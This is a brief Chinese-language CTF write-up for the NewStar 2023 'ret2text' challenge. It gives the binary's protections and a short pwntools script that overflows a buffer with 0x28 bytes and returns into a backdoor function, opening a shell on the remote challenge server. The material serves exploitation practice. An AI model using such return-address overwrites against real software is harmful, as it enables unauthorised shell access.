RocketDevlog

标题: newstar2023 week1 - ret2text
作者: RocketDev
创建于: 2023-09-25 12:00:00
更新于: 2024-07-25 12:34:56
链接: https://rocketma.dev/2023/09/25/W1_ret2text/
版权声明: 本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0 进行许可。

newstar2023 week1 - ret2text

RocketDev

2023-09-25 12:00 2023-09-25 12:00 创建 2024-07-25 12:34:56 2024-07-25 12:34:56 更新

下载ret2text, NX on, PIE off, Canary off, RELRO full
ghidra分析为64位程序

backdoor函数直接打开sh了，打就完了

from pwn import *
sh = remote("node4.buuoj.cn", 29533)
sh.sendline(b'0'*0x28 + p64(0x004011fb)) # addr of backdoor
sh.interactive()

Done.

newstar2023 week1 - ret2text